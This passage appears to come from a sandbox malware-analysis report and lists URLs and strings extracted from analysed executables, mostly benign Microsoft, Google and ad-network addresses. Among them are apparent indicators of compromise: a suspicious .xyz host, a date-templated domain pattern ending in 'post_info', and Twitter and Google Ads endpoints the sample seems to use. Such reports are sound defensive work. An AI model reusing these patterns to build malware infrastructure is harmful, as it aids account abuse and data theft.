Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xCDZ.img?h=75&w=100
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: MiniThunderPlatform.exe.3.drString found in binary or memory: http://store.paycenter.uc.cn
Source: MiniThunderPlatform.exe.3.drString found in binary or memory: http://store.paycenter.uc.cnmail-attachment.googleusercontent.com
Source: MiniThunderPlatform.exe.3.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: MiniThunderPlatform.exe.3.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: MiniThunderPlatform.exe.3.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284560331.0000000003FB5000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: fnhcdXEfus.exeString found in binary or memory: http://www.installshield.com/isetup/ProErrorCentral.asp?ErrorCode=%d
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275181666.00000000033EF000.00000004.00000001.sdmpString found in binary or memory: http://www.interestvideo.com/video1.php
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284658762.0000000003F02000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284658762.0000000003F02000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chromeH
Source: ecvB803.tmp.11.drString found in binary or memory: http://www.msn.com
Source: ecvB803.tmp.11.drString found in binary or memory: http://www.msn.com/
Source: ecvB803.tmp.11.drString found in binary or memory: http://www.msn.com/?ocid=iehp
Source: ecvB803.tmp.11.drString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: ecvB803.tmp.11.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
Source: ecvB803.tmp.11.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
Source: 1612045890161.exe, 0000000B.00000002.267608441.0000000000198000.00000004.00000010.sdmpString found in binary or memory: http://www.nirsoft.net
Source: 1612045890161.exe, 1612045890161.exe.3.drString found in binary or memory: http://www.nirsoft.net/
Source: download_engine.dll.3.drString found in binary or memory: http://www.openssl.org/support/faq.html
Source: download_engine.dll.3.drString found in binary or memory: http://www.openssl.org/support/faq.html....................
Source: download_engine.dll.3.drString found in binary or memory: http://www.xunlei.com/
Source: download_engine.dll.3.drString found in binary or memory: http://www.xunlei.com/GET
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: http://www.youtube.com
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.364204277.0000000003947000.00000004.00000040.sdmpString found in binary or memory: https://1A469593C1FE15DC.xyz/
Source: ecvB803.tmp.11.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;g
Source: ecvB803.tmp.11.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166
Source: ecvB803.tmp.11.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/_/rpc/GaiaInfoService/Get?authuser=0&rpcTrackingId=GaiaInfoService.Get%3A
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/_/rpc/UserByGaiaService/Get?authuser=0&rpcTrackingId=UserByGaiaService.Ge
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/_/rpc/UserCustomerAccessService/List?authuser=0&rpcTrackingId=UserCustome
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/selectaccount
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/selectaccountocation:
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.comsec-fetch-dest:
Source: ecvB803.tmp.11.drString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt
Source: ecvB803.tmp.11.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=
Source: ecvB803.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: ecvB803.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: ecvB803.tmp.11.drString found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://api.twitter.com/1.1/statuses/update.json
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://apis.google.com
Source: ecvB803.tmp.11.drString found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
Source: ecvB803.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
Source: ecvB803.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
Source: ecvB803.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
Source: ecvB803.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
Source: ecvB803.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
Source: ecvB803.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
Source: ecvB803.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
Source: ecvB803.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
Source: ecvB803.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.272953310.0000000003F20000.00000004.00000001.sdmpString found in binary or memory: https://chrome.google.com/webstore
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262358727.0000000003FAB000.00000004.00000001.sdmp, background.js.4.drString found in binary or memory: https://chrome.google.com/webstore/category/extension
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.272918469.000000000309C000.00000004.00000040.sdmpString found in binary or memory: https://chrome.google.com/webstoreAA
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://clients2.google.com/service/update2/cr
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.272953310.0000000003F20000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx5
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx=
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxM
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://content.googleapis.com
Source: ecvB803.tmp.11.drString found in binary or memory: https://contextual.media.net/
Source: ecvB803.tmp.11.drString found in binary or memory: https://contextual.media.net/48/nrrV18753.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
Source: ecvB803.tmp.11.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: ecvB803.tmp.11.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ecvB803.tmp.11.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368731244.00000000034EF000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275181666.00000000033EF000.00000004.00000001.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: ecvB803.tmp.11.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Source: ecvB803.tmp.11.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: ecvB803.tmp.11.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD3B6173
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262688251.0000000003F57000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262688251.0000000003F57000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://drive.google.com/?usp=chrome_app
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_appk/B
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://drive.google.com/drive/settings
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/drive/settingsawl7
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://feedback.googleusercontent.com
Source: ecvB803.tmp.11.drString found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com;
Source: ecvB803.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
Source: ecvB803.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
Source: ecvB803.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
Source: ecvB803.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com;
Source: ecvB803.tmp.11.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: ecvB803.tmp.11.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://hangouts.google.com/
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: ecvB803.tmp.11.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: ecvB803.tmp.11.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: ecvB803.tmp.11.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ecvB803.tmp.11.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: ecvB803.tmp.11.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: ecvB803.tmp.11.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: ecvB803.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5
Source: ecvB803.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937
Source: ecvB803.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css
Source: ecvB803.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ
Source: ecvB803.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://mail.google.com/mail
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://mail.google.com/mail/#settings
Source: ecvB803.tmp.11.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: ecvB803.tmp.11.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: ecvB803.tmp.11.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-22-21-45-19/PreSignInSettingsConfig.json
Source: ecvB803.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-24-17-35-16/PreSignInSettingsConfig.json?One
Source: ecvB803.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update10.xml?OneDriveUpdate=79d8737dc86cbccc6833c
Source: ecvB803.tmp.11.drString found in binary or memory: https://onecs-live.azureedge.net/api/settings/en-US/xml/settings-tipset?release=rs4
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://payments.google.com/
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jstW2
Source: ecvB803.tmp.11.drString found in binary or memory: https://pki.goog/repository/0
Source: ecvB803.tmp.11.drString found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: ecvB803.tmp.11.drString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://sandbox.google.com/
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://sandbox.google.com/payments/v4/js/integr
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsuSS4
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ecvB803.tmp.11.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msn
Source: ecvB803.tmp.11.drString found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284546923.0000000003F0F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284617866.0000000003F9F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284658762.0000000003F02000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284658762.0000000003F02000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284617866.0000000003F9F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/compose/tweetsec-fetch-dest:
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/compose/tweetsec-fetch-mode:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/ookie:
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.comReferer:
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.comsec-fetch-dest:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
